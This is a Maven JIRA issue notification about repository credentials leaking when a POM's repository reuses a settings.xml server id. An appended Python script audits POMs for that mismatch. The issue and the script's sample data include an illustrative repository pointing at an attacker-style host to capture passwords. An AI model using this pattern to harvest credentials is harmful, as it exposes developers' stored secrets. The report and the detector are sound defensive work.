[ https://jira.codehaus.org/browse/MNG-5265?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=340234#comment-340234 ]
Olivier Lamy commented on MNG-5265:
-----------------------------------

As said in a thread on the mailing list, I still consider it as a possible security problem.
But ATM no time to work on that.

> enforce repository url verification for passing authz
> -----------------------------------------------------
>
>                 Key: MNG-5265
>                 URL: https://jira.codehaus.org/browse/MNG-5265
>             Project: Maven 2 & 3
>          Issue Type: Improvement
>          Components: Settings
>    Affects Versions: 2.0.10, 2.2.1, 3.0.2, 3.0.3, 3.0.4
>            Reporter: Olivier Lamy
>             Fix For: 3.2
>
>
> Related discussion: http://markmail.org/message/7pswshucxc7qwtef
> In your settings you have:
> {code}
> <server>
>   <username>olamy</username>
>   <password>reallycomplicatedpassword</password>
>   <id>foo.org</id>
> </server>
> {code}
> During dependency resolution, you get a pom with a repository.
> {code}
> <repository>
>   <id>foo.org</id>
>   <url>http://yourpasswordwillbehacked.org/</url>
> </repository>
> {code}
> Idea: the id in settings must contain the target hostname.

--
This message was sent by Atlassian JIRA
(v6.1.6#6162)
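An audit for the condition described in the issue, as an added example that is not part of the original message and is not Maven code: it flags repositories in a POM whose id matches a `<server>` entry in settings.xml while the URL points at a different host. The function names and sample XML are constructed, and reading "id must contain the target hostname" as "id equals the URL host" is an assumption.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample inputs modelled on the snippets in the issue.
SETTINGS_XML = """<settings><servers>
  <server><id>foo.org</id><username>olamy</username><password>x</password></server>
  <server><id>repo.example.com</id><username>ci</username><password>y</password></server>
</servers></settings>"""

POM_XML = """<project xmlns="http://maven.apache.org/POM/4.0.0"><repositories>
  <repository><id>foo.org</id><url>http://yourpasswordwillbehacked.org/</url></repository>
  <repository><id>repo.example.com</id><url>https://repo.example.com/releases</url></repository>
  <repository><id>central-mirror</id><url>https://mirror.example.net/maven2</url></repository>
</repositories></project>"""

def _local(tag):
    # Strip the XML namespace so POMs with and without xmlns parse alike.
    return tag.rsplit("}", 1)[-1]

def _descendants(elem, name):
    return [c for c in elem.iter() if _local(c.tag) == name]

def _text(elem, name):
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""

def server_ids(settings_xml):
    """Ids of <server> entries, i.e. ids that have credentials attached."""
    root = ET.fromstring(settings_xml)
    return {_text(s, "id") for s in _descendants(root, "server")}

def host_matches_id(server_id, url):
    """Assumed rule: the server id must equal the host the request goes to."""
    host = urlsplit(url).hostname or ""  # hostname is already lower-cased
    return bool(host) and host == server_id.lower()

def audit_pom(pom_xml, settings_xml):
    """Return (id, url) pairs that reuse a credentialed id for another host."""
    ids = server_ids(settings_xml)
    root = ET.fromstring(pom_xml)
    findings = []
    for tag in ("repository", "pluginRepository"):
        for repo in _descendants(root, tag):
            rid, url = _text(repo, "id"), _text(repo, "url")
            if rid in ids and not host_matches_id(rid, url):
                findings.append((rid, url))
    return findings
```

Repositories whose id has no `<server>` entry are ignored because no credentials are attached to them.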